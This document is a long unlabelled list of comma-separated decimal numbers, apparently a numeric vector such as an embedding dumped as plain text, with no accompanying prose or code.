-0.006537769455462694, -0.0012218453921377659, 0.01280446071177721, 0.01024516299366951, -0.01101056020706892, 0.004783733747899532, 0.020506272092461586, 0.0017460628878325224, 0.017046038061380386, 0.0026709181256592274, 0.0042296177707612514, 0.012254331260919571, 0.014861466363072395, 0.0023719347082078457, -0.020777350291609764, -0.016790905967354774, -0.0003371037309989333, -0.005987640004605055, 0.0009163839858956635, -0.005585009232163429, 0.012788514606654644, -0.0061989217065274715, -0.019071152433753014, -0.016663338989019394, 0.0021546734496951103, 0.013872828334569931, 0.002222442999482155, 0.029005372896790504, -0.004145902581512928, -0.0060155452229082584, 0.018640616908669472, -0.017364954575896263, -0.0038648582994937897, -0.004871435463428497, 0.0035000985953956842, -0.015068761073052883, -0.02192544750869274, -0.027649981901049614, -0.01044448558241129, 0.012397843413054943, 0.018241971731185913, 0.0033486136235296726, -0.0001737840793794021, 0.02123977802693844, 0.005293998867273331, -0.011018533259630203, -0.0026310535613447428, 0.0015925847692415118, -0.0010922858491539955, -0.014279445633292198, 0.0026848705019801855, 0.017109820619225502, -0.00888977199792862, -0.009862464852631092, -0.0007285227766260505, -0.019023314118385315, -0.00143611675594002, 0.0024616296868771315, -0.017891164869070053, -0.011154072359204292, -0.006007572170346975, 0.01624874956905842, 0.010540160350501537, -0.00456447945907712, -0.01138528622686863, 0.0017550323391333222, 0.0006507871439680457, 0.008347615599632263, -0.0033446273300796747, -0.02906915545463562, -0.015778347849845886, -0.003526010550558567, 0.012716758996248245, -0.00458441162481904, -0.01435917429625988, -0.017588194459676743, 0.01619293913245201, 0.009878410026431084, -0.0030556099954992533, -0.01750846579670906, 0.003256925381720066, 0.006123179104179144, 0.009742870926856995, 0.0038768176455050707, 0.006585606839507818, -0.023360567167401314, -0.005832168739289045, -0.01321905106306076, 0.0048395441845059395, 0.0062627047300338745, 0.004715964198112488, -0.007434719707816839, -0.008092482574284077, -0.02071356773376465, -0.0077376896515488625, -0.000801275426056236, 0.014072149991989136, -0.0024436907842755318, -0.019708983600139618, 0.0039007363375276327, -0.014638225547969341, 0.00629459647461772, -0.011775958351790905, -0.0031632438767701387, -0.005923856981098652, 0.00951963011175394, 0.001585608464665711, 0.025337843224406242, 0.00892963632941246, 0.019406013190746307, 0.011592581868171692, 0.020235193893313408, 0.005321904085576534, -0.006581620313227177, 0.00912895891815424, -0.016774959862232208, -0.003231013659387827, -0.0010574044426903129, -0.016759013757109642, 0.0007928042323328555, 0.002274266676977277, 0.009679088369011879, 0.0232489462941885, -0.018720345571637154, -0.013107430189847946, -0.002938009798526764, 0.016009561717510223, 0.012947972863912582, 0.0007668923353776336, -0.010532187297940254, -0.004823598079383373, 0.0005486344452947378, 0.007052021101117134, -0.004018336534500122, -0.023822994902729988, -0.005696629639714956, 0.021287616342306137, -0.004560492932796478, -0.013761207461357117, 0.03332667797803879, -0.0061032469384372234, -0.012549328617751598, -0.02127167023718357, -0.001008072285912931, 0.022579222917556763, 0.019230609759688377, -0.00491528632119298, 0.013673505745828152, 0.004177794326096773, 0.002730714622884989, -0.0035718546714633703, -0.012294195592403412, 0.0062387860380113125, 0.00128363526891917, 0.006509864237159491, -0.005796290934085846, 0.0042375908233225346, 0.0011859673541039228, -0.004572452045977116, -0.009487738832831383, -0.004133943468332291, -0.011241774074733257, -0.005409605801105499, -0.0033007762394845486, -0.00607534172013402, -0.019533580169081688, 0.016966309398412704, -0.01083515677601099, 0.004056207835674286, -0.004971096757799387, 0.003651583567261696, 0.004819612018764019, -0.016535773873329163, -0.020155465230345726, -0.005385687109082937, 0.035303954035043716, 0.010827184654772282, 0.005883992649614811, -0.008642612025141716, -0.0016214863862842321, -0.000045781827793689445, 0.04136335104703903, -0.008770179003477097, -0.000931831484194845, -0.015403622761368752, -0.009886383078992367, -0.018321700394153595, -0.0010803265031427145, -0.03485747426748276, -0.014630252495408058, -0.01645604521036148, 0.00808052346110344, 0.002232409082353115, 0.006792902015149593, 0.004731909837573767, 0.028973480686545372, -0.00629459647461772, -0.009503684937953949, -0.005186364520341158, -0.005943789146840572, -0.01961330883204937, -0.006605539005249739, -0.011736094020307064, -0.0017809441778808832, 0.006147097796201706, 0.017620086669921875, 0.006454054266214371, 0.015586999244987965, -0.010787319391965866, 0.014191743917763233, 0.0012567266821861267, -0.01221446692943573, -0.024349205195903778, 0.007406814489513636, -0.013490129262208939, -0.005963721312582493, 0.010261109098792076, -0.018544942140579224, -0.007618096191436052, 0.0012617098400369287, -0.030982648953795433, -0.011696228757500648, 0.006270677782595158, 0.006860671564936638, -0.0014919269597157836, 0.011177991516888142, -0.00869044940918684, 0.003651583567261696, 0.002268287120386958, -0.008251940831542015, 0.013920665718615055, 0.0019742867443710566, -0.0033386475406587124, -0.0027287215925753117, 0.0004574445483740419, 0.007785526569932699, 0.003928641323000193, -0.002764599397778511, 0.02811240963637829, -0.019708983600139618, -0.005397646222263575, -0.0481562539935112, -0.007522421423345804, 0.02337651327252388, -0.01948574185371399, 0.005286025814712048, 0.012318114750087261, -0.015315921045839787, -0.011608527041971684, -0.012573246844112873, -0.00530994450673461, 0.004803665913641453, 0.0012049030046910048, 0.005246161483228207, 0.021510856226086617, 0.00729918060824275, 0.0009378111572004855, -0.006916482001543045, 0.022834356874227524, 0.015403622761368752, -0.0037173598539084196, 0.014853493310511112, -0.005130554549396038, 0.004676099866628647, 0.014104042202234268, -0.0015397643437609076, -0.028303759172558784, -0.001752042560838163, -0.005186364520341158, -0.023567862808704376, -0.005090690217912197, -0.001652381382882595, 0.028957534581422806, -0.005768385715782642, -0.014749845489859581, -0.0015935812843963504, 0.003832966787740588, 0.004715964198112488, 0.034123968333005905, -0.0002239883760921657, -0.00002479070462868549, -0.010436512529850006, 0.010229217819869518, -0.04059795290231705, -0.009073148481547832, -0.0063264877535402775, 0.021686259657144547, 0.005317917559295893, -0.010994615033268929, -0.006493918597698212, 0.006473986431956291, 0.00572453485801816, -0.005010961089283228, 0.015874022617936134, 0.0035678681451827288, 0.009950166568160057, -0.0034442883916199207, 0.01442295778542757, -0.008180185221135616, -0.012660948559641838, 0.02004384435713291, -0.025513246655464172, 0.007518434897065163, 0.007980862632393837, -0.003223040606826544, -0.0061271656304597855, 0.025927837938070297, 0.013721343129873276, 0.022914085537195206, 0.024620283395051956, 0.009041257202625275, 0.0016772967064753175, -0.011345421895384789, 0.008371533825993538, -0.01956547051668167, -0.015100653283298016, -0.016121182590723038, 0.019708983600139618, 0.03960931673645973, -0.004827584605664015, 0.013864855282008648, 0.0079689035192132, -0.0024018329568207264, -0.012445680797100067, 0.004552519880235195, -0.0053498088382184505, -0.004875421989709139, -0.013434318825602531, -0.02771376445889473, 0.017651977017521858, 0.0463065430521965, -0.011752039194107056, -0.009089094586670399, -0.009878410026431084, 0.014893357641994953, -0.008427344262599945, -0.0013254928635433316, -0.013880801387131214, -0.008674504235386848, -0.012118792161345482, -0.024620283395051956, -0.01042056642472744, 0.029579421505331993, -0.00899341981858015, 0.018401429057121277, -0.011154072359204292, -0.01083515677601099, -0.04343630373477936, -0.015196328051388264, -0.009631250984966755, 0.015866050496697426, 0.007127763237804174, 0.01667928509414196, 0.012860271148383617, -0.012381897307932377, -0.0006343430140987039, -0.01602550782263279, -0.0014949168544262648, -0.02521027810871601, -0.004995015449821949, -0.00763005530461669, 0.0022662938572466373, 0.012916081584990025, 0.011783931404352188, 0.015523215755820274, -0.0024098060093820095, 0.007235397584736347, -0.009742870926856995, 0.013330671936273575, 0.005852100905030966, 0.010021922178566456, -0.022340036928653717, -0.00934422668069601, -0.027554307132959366, -0.006541755981743336, -0.03067968040704727, -0.02021924778819084, 0.001369343837723136, 0.0035977663937956095, -0.020075736567378044, -0.01873629167675972, -0.02189355529844761, -0.0197408739477396, 0.00020505275460891426, 0.007741675712168217, 0.014255526475608349, -0.014965114183723927, -0.007673906162381172, 0.017173605039715767, 0.0016932424623519182, -0.030089685693383217, -0.026167023926973343, -0.019820604473352432, -0.006585606839507818, -0.007845323532819748, -0.013625668361783028, 0.00542953796684742, -0.0006154074217192829, -0.027873221784830093, 0.006968305446207523, 0.013203104957938194, -0.003233006689697504, 0.0051504867151379585, -0.008730313740670681, -0.01816224306821823, 0.0009497705032117665, -0.003368545789271593, 0.02350407838821411, 0.025991620495915413, -0.0021885582245886326, -0.0034104036167263985, -0.013211078010499477, 0.013019728474318981, -0.009089094586670399, -0.014143906533718109, -0.0265656691044569, 0.00906517542898655, -0.01584213227033615, -0.005736493971198797, 0.022563278675079346, 0.006234799511730671, 0.004987042397260666, -0.010603942908346653, -0.01592983305454254, -0.027984842658042908, 0.0018267882987856865, 0.022483548149466515, -0.014024312607944012, -0.025640813633799553, 0.012405816465616226, -0.0032908101566135883, -0.00475981505587697, 0.0049511645920574665, 0.018720345571637154, 0.009687061421573162, -0.01777954399585724, -0.001333465799689293, -0.00527406670153141, -0.006980265025049448, 0.023009760305285454, 0.035782329738140106, 0.0023500092793256044, 0.014470795169472694, 0.006330474279820919, 0.003366552758961916, -0.0010354790138080716, -0.002208490390330553, 0.0028702402487397194, 0.01733306236565113, 0.00812437478452921, -0.0004317818093113601, 0.004072153475135565, 0.0029798676259815693, -0.016081318259239197, -0.00014488236047327518, 0.0004895852762274444, -0.0030914880335330963, 0.018098460510373116, 0.011329475790262222, -0.001547737163491547, 0.003492125775665045, -0.004424953833222389, -0.025592975318431854, -0.01383296400308609, -0.007933025248348713, 0.005541158374398947, 0.018273863941431046, 0.0022882192861288786, 0.0037193531170487404, 0.011026506312191486, 0.002146700629964471, -0.0017370933201164007, 0.012501491233706474, -0.0008590788347646594, -0.02004384435713291, -0.007052021101117134, 0.00672911899164319, -0.0006438108393922448, 0.003428342519327998, 0.009886383078992367, -0.015339840203523636, -0.008188157342374325, 0.0022782532032579184, -0.010197325609624386, -0.010364756919443607, 0.004369143396615982, -0.01707793027162552, 0.011457042768597603, -0.01597767136991024, -0.013466211035847664, -0.022834356874227524, -0.02079329639673233, -0.005784331355243921, -0.005222242791205645, 0.0240302886813879, 0.009400037117302418, -0.023264892399311066, 0.005808250047266483, -0.011162045411765575, -0.008523019030690193, -0.020729513838887215, 0.005816223099827766, -0.011409205384552479, 0.010253136046230793, 0.03012157790362835, -0.030568059533834457, -0.004688058979809284, 0.016344424337148666, 0.003651583567261696, 0.01913493499159813, 0.008044646121561527, -3.270130548571615e-7, -0.03559098020195961, -0.0015018930425867438, -0.011783931404352188, -0.01860872469842434, 0.021128157153725624, -0.0058401417918503284, 0.0051544732414186, -0.007638028357177973, 0.02691647596657276, 0.0036555698607116938, -0.0042774551548063755, -0.01124974712729454, -0.00930436234921217, -0.005158459767699242, -0.025162439793348312, -0.008483154699206352, -0.014869439415633678, -0.0037352987565100193, -0.018098460510373116, -0.003799082012847066, -0.0037352987565100193, 0.008180185221135616, 0.015172408893704414, -0.0030536167323589325, -0.004020329564809799, -0.010045841336250305, 0.0128682442009449, -0.002049032598733902, 0.011345421895384789, 0.00003143996946164407, 0.022643007338047028, -0.020251139998435974, -0.007430733181536198, -0.02136734500527382, 0.014725927263498306, -0.015196328051388264, 0.0011590588837862015, 0.01356985792517662, 0.009710979647934437, -0.007494516205042601, -0.0018457239493727684, 0.013083511963486671, 0.012126765213906765, -0.009439901448786259, 0.005405619274824858, 0.021112211048603058, -0.007323099300265312, 0.0012926047202199697, 0.015451460145413876, -0.003033684566617012, -0.01667928509414196, 0.024747850373387337, -0.01138528622686863, 0.007933025248348713, -0.021032482385635376, 0.002304165158420801, -0.010595970787107944, -0.0007873228751122952, -0.0027406809385865927, -0.010587997734546661, -0.003380505135282874, -0.04767788201570511, 0.004628262482583523, 0.00015385185542982072, 0.002469602506607771, 0.004337252117693424, 0.006964318919926882, 0.012461626902222633, -0.007885187864303589, 0.020873025059700012, 0.006390271242707968, -0.007646001409739256, 0.013537966646254063, 0.010293000377714634, -0.020330868661403656, -0.0025433518458157778, -0.04212874919176102, 0.033071547746658325, 0.006757024209946394, 0.003346620360389352, -0.02001195400953293, -0.005002988502383232, 0.0008351602009497583, 0.003352600149810314, -0.00232011079788208, -0.0041897534392774105, -0.008706395514309406, -0.020809242501854897, 0.005883992649614811, -0.008068564347922802, 0.023009760305285454, 0.0040542143397033215, 0.021861663088202477, 0.01142515055835247, -0.019406013190746307, -0.026629451662302017, -0.0012308148434385657, 0.001022523152641952, 0.008148293010890484, -0.003972492180764675, -0.022212469950318336, 0.011568662710487843, -0.01843332126736641, 0.011433123610913754, 0.012517436407506466, 0.017970893532037735, -0.011807849630713463, 0.00658959336578846, -0.008483154699206352, -0.006529796868562698, -0.018624670803546906, -0.016392260789871216, 0.007052021101117134, -0.0001815078139770776, -0.008016740903258324, -0.008650585077702999, 0.026422156020998955, 0.006517837289720774, 0.02232409082353115, 0.005652778781950474, 0.011512852273881435, 0.022292200475931168, 0.0030117591377347708, 0.012597166001796722, -0.011760012246668339, -0.015315921045839787, -0.023233000189065933, -0.003954553510993719, -0.004692045506089926, -0.029834553599357605, 0.02127167023718357, 0.005740480497479439, 0.012007172219455242, -0.02136734500527382, -0.001925452845171094, 0.006079328246414661, 0.018704399466514587, 0.03724934160709381, -0.008315724320709705, 0.001528801629319787, -0.006916482001543045, 0.013362563215196133, 0.0029818606562912464, 0.0034143899101763964, 0.00045844115084037185, -0.0038887769915163517, -0.020522218197584152, -0.0021626462694257498, -0.02312137931585312, -0.021000592038035393, 0.0072872210294008255, -0.027554307132959366, -0.016663338989019394, -0.02096869982779026, -0.00930436234921217, -0.009878410026431084, 0.017173605039715767, 0.004743869416415691, 0.00005060916373622604, -0.023583807051181793, -0.008395452983677387, -0.0039027296006679535, 0.008204103447496891, -0.02500298246741295, 0.0018437306862324476, -0.018194133415818214, -0.02661350555717945, 0.02337651327252388, 0.018895749002695084, 0.0019394054543226957, 0.003197128651663661, -0.011050425469875336, -0.01024516299366951, 0.016535773873329163, -0.010061786510050297, 0.001029499340802431, 0.016208885237574577, -0.002258321037515998, -0.0067769563756883144, 0.017620086669921875, -0.023392457515001297, -0.014048231765627861, 0.015315921045839787, 0.0024496703408658504, -0.029866443946957588, 0.016711177304387093, 0.00995813962072134, 0.0004851004923693836, -0.003992424346506596, 0.004552519880235195, -0.0019354189280420542, 0.023344621062278748, 0.024333259090781212, 0.0008142313454300165, 0.022930031642317772, 0.007761607877910137, 0.0005227226065471768, 0.020235193893313408, -0.010500296019017696, 0.007933025248348713, 0.007709784433245659, 0.008020726963877678, -0.010675699450075626, -0.00001666209391260054, -0.0028443282935768366, 0.0037113800644874573, 0.018401429057121277, 0.02425353042781353, 0.004775760695338249, 0.004711977671831846, 0.0058640604838728905, -0.018592778593301773, -0.00542953796684742, 0.005668724421411753, -0.01044448558241129, -0.025465410202741623, -0.006597566418349743, 0.0030795286875218153, -0.001462028594687581, -0.008786124177277088, 0.0022124769166111946, 0.01624077558517456, 0.024939198046922684, 0.016663338989019394, -0.02004384435713291, -0.00458441162481904, -0.0005506277084350586, 0.01663144864141941, 0.014263499528169632, -0.034347210079431534, -0.0009487738716416061, -0.006920468062162399, 0.0431811697781086, 0.0049750832840800285, 0.0051903510466217995, 0.0006781939300708473, 0.0022184564732015133, 0.005042852833867073, -0.008961527608335018, 0.023870831355452538, 0.0010853096609935164, 0.006697227247059345, -0.005230215843766928, -0.00808052346110344, -0.013234997168183327, 0.0010942791122943163, 0.02639026567339897, 0.00006147845124360174, -0.01148893404752016, 0.007362963631749153, -0.004161848220974207, 0.006246759090572596, 0.008475181646645069, 0.009288416244089603, -0.014877412468194962, -0.014622279442846775, -0.008387479931116104, -0.013195132836699486, 0.001614510198123753, -0.006246759090572596, -0.021048428490757942, 0.010005977004766464, 0.00936814583837986, 0.029882390052080154, 0.002084910636767745, -0.014861466363072395, 0.003613712266087532, -0.004209685605019331, 0.007897146977484226, 0.008945582434535027, 0.03077535331249237, -0.0060155452229082584, 0.01109826285392046, 0.008905718103051186, -0.013912692666053772, -0.0010035875020548701, 0.024094073101878166, 0.0007888177642598748, 0.006322501692920923, 0.005242174956947565, 0.014614306390285492, 0.008307751268148422, 0.024843525141477585, 0.03310343623161316, 0.0007220448460429907, 0.01335459016263485, 0.0035738477017730474, -0.001020031631924212, -0.0007001193589530885, 0.008698422461748123, -0.014430929906666279, -0.01131353061646223, -0.015905914828181267, -0.004636235535144806, -0.004133943468332291, 0.010149488225579262, 0.016934417188167572, -0.04219253361225128, -0.016615502536296844, -0.008961527608335018, 0.003258918644860387, 0.00468407291918993, 0.0003779648104682565, 0.002196531044319272, 0.005206297151744366, 0.0020629852078855038, 0.011927442625164986, 0.0006776956142857671, 0.010715563781559467, 0.02455650083720684, 0.005704602692276239, 0.01238987036049366, -0.004353197757154703, -0.020873025059700012, -0.00851504597812891, -0.0025732500944286585, -0.018098460510373116, -0.022930031642317772, 0.015499297529459, -0.021526802331209183, -0.013936610892415047, -0.006282636895775795, -0.0068487124517560005, 0.01755630224943161, 0.009647196158766747, 0.026693234220147133, -0.009631250984966755, 0.006242772564291954, -0.014247553423047066, 0.0003111918631475419, -0.017221441492438316, -0.004971096757799387, -0.0007175600621849298, -0.023089488968253136, -0.0034721933770924807, -0.011983253061771393, -0.01238987036049366, -0.004799679387360811, 0.004133943468332291, 0.0006577633903361857, 0.008355588652193546, -0.001410204917192459, -0.021351398900151253, 0.005297985393553972, 0.014143906533718109, 0.019724929705262184, -0.0022623075637966394, -0.01883196458220482, -0.010396648198366165, -0.01589794270694256, 0.005967707838863134, 0.0005506277084350586, -0.005369741003960371, -0.024157855659723282, 0.016487935557961464, 0.010436512529850006, 0.019326284527778625, -0.015905914828181267, 0.00941598229110241, 0.008016740903258324, 0.007347017992287874, -0.011170018464326859, -0.006836752872914076, 0.00895355548709631, 0.0038927632849663496, 0.0066892546601593494, 0.024110019207000732, -0.0009333263733424246, 0.007777553983032703, 0.012405816465616226, 0.025927837938070297, -0.007307153195142746, -0.012932026758790016, -0.007956943474709988, -0.004106038250029087, -0.010603942908346653, -0.00411401130259037, -0.010564078576862812, 0.0026310535613447428, 0.00018873324734158814, -0.008156266063451767, 0.007825391367077827, 0.01107434369623661, 0.00853896513581276, -0.02513054758310318, 0.00006808100442867726, 0.0050627849996089935, -0.010715563781559467, -0.004173807799816132, 0.001350408187136054, 0.007291207555681467, -0.01685468852519989, -0.011520825326442719, -0.01581024006009102, 0.012684867717325687, 0.016169020906090736, -0.008969500660896301, -0.0049990019761025906, 0.023807048797607422, -0.018226025626063347, 0.007992821745574474, -0.0025134533643722534, 0.008658558130264282, 0.030982648953795433, 0.02508271113038063, -0.013274861499667168, 0.00029350200202316046, -0.022308144718408585, -0.009974084794521332, 0.0029898337088525295, 0.019724929705262184, -0.007123776711523533, 0.001455052406527102, -0.020283032208681107, 0.001949371537193656, -0.011552717536687851, -0.020729513838887215, -0.007482557091861963, -0.020123573020100594, 0.007554313167929649, -0.019852494820952415, 0.020809242501854897, 0.005736493971198797, 0.013785126619040966, 0.01518835499882698, -0.027219444513320923, 0.01470998115837574, 0.011911497451364994, 0.026852691546082497, -0.017237387597560883, 0.00025077228201553226, 0.02618297003209591, -0.010293000377714634, 0.016137128695845604, 0.036579616367816925, -0.002060991944745183, -0.015315921045839787, 0.02876618690788746, 0.00014388574345503002, -0.003440301865339279, -0.0024995009880512953, 0.01044448558241129, -0.005772372242063284, 0.007506475783884525, 0.01131353061646223, 0.0017659950535744429, -0.002367948181927204, -0.01961330883204937, -0.011026506312191486, -0.02819213829934597, 0.028606727719306946, 0.008921663276851177, -0.024046234786510468, -0.005680684000253677, 0.0039027296006679535, 0.018098460510373116, 0.006218853872269392, 0.007562285754829645, 0.011066370643675327, -0.019948169589042664, -0.025194332003593445, 0.005561090540140867, -0.02902131900191307, -0.005282039288431406, -0.005828182213008404, 0.007438706234097481, -0.008235994726419449, -0.0079689035192132, 0.00099860446061939, -0.0028403420001268387, -0.01006975956261158, 0.003697427688166499, 0.007502489257603884, 0.014135933481156826, -0.021654369309544563, 0.007753635291010141, 0.016360370442271233, 0.005162446293979883, -0.012246358208358288, -0.04790112003684044, 0.017827380448579788, -0.00983057264238596, -0.008419371210038662, 0.002186564961448312, -0.019230609759688377, 0.01913493499159813, -0.01655171811580658, 0.005026906728744507, 0.0017151678912341595, -0.006860671564936638, -0.006577633786946535, -0.0005595972179435194, -0.006390271242707968, 0.00971895270049572, 0.008387479931116104, 0.002788518089801073, -0.0024955144617706537, 0.027602143585681915, -0.012326087802648544, 0.011496907100081444, 0.014717954210937023, -0.005178391933441162, 0.003123379545286298, -0.002096869982779026, -0.009160850197076797, 0.0275383610278368, -0.0015397643437609076, -0.004835557658225298, 0.018624670803546906, -0.007502489257603884, 0.009591386653482914, 0.004524615127593279, 0.008961527608335018, 0.024141909554600716, 0.009272471070289612, -0.005258120596408844, -0.0021187954116612673, -0.022866247221827507, -0.009591386653482914, -0.01795494742691517, -0.014199716970324516, -0.02508271113038063, -0.014646198600530624, 0.02337651327252388, -0.0011191944358870387, -0.0015278049977496266, 0.01707793027162552, 0.017667923122644424, 0.004488736856728792, -0.0283197034150362, -0.0071357362903654575, 0.004612316843122244, -0.007295194081962109, 0.004995015449821949, -0.012445680797100067, 0.016519827768206596, 0.01280446071177721, 0.00462028943002224, -0.014510659500956535, 0.0058401417918503284, -0.002641019644215703, -0.0006627464317716658, 0.006302569527179003, -0.008802070282399654, 0.0008800076902844012, 0.001899541006423533, -0.005377714056521654, 0.0013434318825602531, 0.01969303749501705, -0.013306752778589725, -0.015945779159665108, -0.007741675712168217, -0.008794097229838371, 0.0049990019761025906, -0.020378705114126205, 0.017141712829470634, -0.025864053517580032, -0.024763794615864754, 0.007614109665155411, 0.045764386653900146, -0.029196722432971, 0.01720549538731575, 0.00010202807607129216, 0.010261109098792076, -0.015523215755820274, -0.018927639350295067, -0.0013673505745828152, 0.006410203408449888, -0.009312335401773453, 0.006757024209946394, -0.00031916474108584225, -0.01166433747857809, -0.009288416244089603, 0.02289813943207264, 0.005006974563002586, 0.016296586021780968, -0.007446678820997477, -0.012924054637551308, 0.016097264364361763, 0.014143906533718109, 0.011959334835410118, -0.000962726422585547, 0.0030416573863476515, -0.00827585905790329, 0.005836155265569687, 0.021383289247751236, 0.014765791594982147, 0.0016483949730172753, 0.0029639217536896467, 0.014821602031588554, -0.004692045506089926, -0.011297584511339664, -0.006872630678117275, -0.027203500270843506, -0.0003473190008662641, 0.01961330883204937, 0.005792304407805204, -0.00660952553153038, 0.002860274165868759, 0.006745064631104469, 0.012844325043261051, -0.005680684000253677, -0.024460826069116592, 0.008666531182825565, -0.007303167134523392, 0.005577036179602146, -0.012429734691977501, 0.008849907666444778, -0.0012357978848740458, -0.0001583366101840511, 0.01197528000921011, -0.0019095070892944932, 0.00836356170475483, 0.01201514434069395, 0.010516241192817688, 0.017524411901831627, 0.024715958163142204, 0.015786321833729744, -0.024221638217568398, 0.0011570656206458807, 0.0071995193138718605, -0.011504880152642727, -0.002886186121031642, -0.009567467495799065, -0.01567470096051693, 0.02372732013463974, -0.01028502732515335, 0.003209087997674942, 0.0001455052406527102, -0.0069762784987688065, -0.010994615033268929, 0.029978064820170403, -0.0006682277889922261, -0.005002988502383232, 0.01777954399585724, 0.010532187297940254, -0.008379506878554821, -0.016176993027329445, -0.009264498017728329, -0.013258915394544601, 0.0028881793841719627, -0.0007823397754691541, 0.009320308454334736, -0.0036077324766665697, 0.025050818920135498, 0.04595573619008064, -0.004401035141199827, -0.024221638217568398, 0.02009168267250061, 0.006872630678117275, -0.020426543429493904, 0.010468403808772564, 0.007590190973132849, -0.000912895891815424, 0.028702402487397194, 0.012924054637551308, -0.001623479649424553, 0.009998003952205181, 0.01878412812948227, -0.0036077324766665697, 0.00664540333673358, 0.009535576216876507, -0.01079529244452715, -0.0027048029005527496, -0.019326284527778625, 0.006079328246414661, 0.01939006708562374, 0.0022304158192127943, -0.00015422557771671563, 0.007255329750478268, 0.010492322966456413, 0.02985049970448017, -0.0025872027035802603, -0.0111381271854043, -0.02192544750869274, 0.025927837938070297, 0.023360567167401314, -0.0429898202419281, 0.000986645114608109, 0.0094797657802701, 0.004596370737999678, -0.008443290367722511, -0.0002695833391044289, 0.0013633641647174954, -0.005764399189502001, -0.0049990019761025906, 0.0009293399634771049, -0.005939802620559931, 0.016121182590723038, -0.01567470096051693, -0.0019772767554968596, 0.005317917559295893, -0.0021387275774031878, -0.013370536267757416, 0.022834356874227524, -0.0051265680231153965, -0.0006074345437809825, -0.013840936124324799, -0.009567467495799065, 0.004811638966202736, 0.019326284527778625, -0.005345822311937809, -0.0034622272942215204, -0.01913493499159813, -0.001535777817480266, -0.0015537168364971876, -0.005266093648970127, -0.011377313174307346, 0.003992424346506596, -0.005122581496834755, -0.002120788674801588, -0.027602143585681915, 0.006083314772695303, 0.015292002819478512, 0.002922064159065485, 0.01916682720184326, -0.0103089464828372, -0.012916081584990025, -0.0062627047300338745, -0.013697424903512001, 0.03590989485383034, 0.010316919535398483, -0.0012437708210200071, -0.011417178437113762, 0.003209087997674942, -0.0009114009444601834, 0.0010215265210717916, 0.004656167700886726, -0.025337843224406242, 0.01655171811580658, -0.007861269637942314, 0.018720345571637154, 0.00005661997420247644, 0.0006816820823587477, 0.004628262482583523, 0.02570459619164467, -0.014957141131162643, -0.006605539005249739, -0.0022782532032579184, -0.009336253628134727, -0.00022735193488188088, -0.005313931033015251, -0.010229217819869518, -0.006561688147485256, 0.00016880102339200675, 0.0048873815685510635, 0.0033984442707151175, 0.010197325609624386, -0.007829377427697182, 0.012605139054358006, 0.01865656115114689, 0.011289611458778381, -0.019645201042294502, 0.01473390031605959, -0.008802070282399654, 0.000032576728699496016, 0.0008401432423852384, -0.023312728852033615, -0.017651977017521858, -0.02123977802693844, 0.029404018074274063, -0.019326284527778625, -0.010045841336250305, -0.03190750628709793, -0.028383487835526466, 0.02438109740614891, 0.016049426048994064, -0.014646198600530624, 0.017285224050283432, 0.010261109098792076, -0.013314725831151009, 0.013298779726028442, -0.02071356773376465, 0.0004826089716516435, -0.00411401130259037, 0.0009427941986359656, 0.01903926022350788, -0.004680086392909288, 0.007366950158029795, 0.020059790462255478, 0.0008805060060694814, -0.013298779726028442, -0.00910503976047039, 0.00021240276691969484, 0.008419371210038662, 0.006649389863014221, -0.00464022159576416, 0.001485947286710143, -0.029148884117603302, -0.002730714622884989, 0.010643808171153069, 0.0051664323545992374, 0.009312335401773453, 0.005042852833867073, -0.0012019131099805236, -0.0005045344005338848, -0.008283832110464573, 0.004907313734292984, 0.006167029961943626, 0.025624867528676987, -0.01398444827646017, -0.013737289234995842, 0.005022920668125153, -0.010436512529850006, -0.00816423911601305, 0.06046639382839203, 0.005122581496834755, 0.006661349441856146, 0.01317918673157692, -0.019900333136320114, 0.0073111397214233875, 0.004476777743548155, -0.0030017930548638105, 0.0019075138261541724, -0.012581219896674156, -0.011154072359204292, 0.005250148009508848, 0.00827585905790329, -0.015961725264787674, -0.001961330883204937, -0.006446081213653088, -0.0019503681687638164, 0.00560494139790535, -0.009551521390676498, -0.033549919724464417, -0.0012945979833602905, -0.00643412210047245, 0.007347017992287874, -0.021686259657144547, -0.0002628561924211681, -0.0020031884778290987, -0.005234201904386282, -0.01352999359369278, -0.005441497080028057, 0.007016142830252647, 0.03150885924696922, -0.004273469094187021, -0.002790511352941394, -0.015212273225188255, 0.02106437459588051, 0.0016174999764189124, 0.01615307480096817, 0.010085705667734146, 0.003964519593864679, -0.0005700616165995598, 0.0020809241104871035, -0.008064578287303448, -0.02390272356569767, 0.005194337572902441, -0.01282837986946106, 0.018704399466514587, -0.007817418314516544, 0.022563278675079346, 0.029340233653783798, 0.012381897307932377, -0.0049272459000349045, 0.009710979647934437, 0.002369941445067525, 0.016487935557961464, 0.002433724468573928, 0.00503487978130579, 0.018624670803546906, -0.00025326383183710277, -0.029085101559758186, -0.012365952134132385, -0.007044048048555851, 0.0009886383777484298, -0.022387873381376266, -0.015180381946265697, -0.018879802897572517, 0.00005920493640587665, 0.01096272375434637, 0.008315724320709705, 0.002220449736341834, 0.017795490100979805, -0.009152877144515514, -0.015387676656246185, -0.005768385715782642, -0.0018796087242662907, 0.0008670517709106207, -0.022260308265686035, -0.008618693798780441, -0.009336253628134727, 0.009081121534109116, -0.005939802620559931, -0.02092086337506771, -0.01939006708562374, 0.027905113995075226, -0.009854491800069809, 0.013514048419892788, -0.004711977671831846, -0.006230813451111317, -0.0034602340310811996, -0.002057005651295185, -0.007083912380039692, 0.02197328396141529, 0.0016802864847704768, -0.002346022753044963, -0.024508662521839142, 0.003896749811246991, -0.013729316182434559, 0.00589993828907609, 0.012397843413054943, -0.0005132547812536359, -0.00505481194704771, 0.02849510684609413, 0.007036074995994568, -0.014279445633292198, -0.005074744112789631, 0.008016740903258324, -0.00928044319152832, 0.023583807051181793, -0.016471989452838898, -0.024620283395051956, 0.0036057394463568926, 0.005010961089283228, -0.01335459016263485, -0.018465211614966393, -0.004058200865983963, 0.00214470736682415, 0.009647196158766747, 0.012756623327732086, -0.016998201608657837, -0.005417578388005495, 0.01642415300011635, -0.010404621250927448, 0.00274267396889627, 0.002379907527938485, -0.0024117990396916866, 0.0006926447967998683, -0.00969503354281187, 0.0008780144853517413, 0.0068008750677108765, 0.006569661200046539, 0.009216660633683205, -0.0008022719994187355, -0.003713373327627778, 0.010914886370301247, 0.011002588085830212, 0.016583610326051712, 0.014702009037137032, 0.005202310625463724, 0.02079329639673233, 0.013553912751376629, 0.004624275956302881, 0.012206493876874447, 0.03677096590399742, -0.01508470717817545, -0.00532987667247653, -0.01873629167675972, 0.006964318919926882, 0.00995813962072134, -0.002232409082353115, -0.005361768417060375, -0.006226826924830675, 0.008387479931116104, 0.009703006595373154, -0.010827184654772282, -0.000656268501188606, 0.001530794776044786, 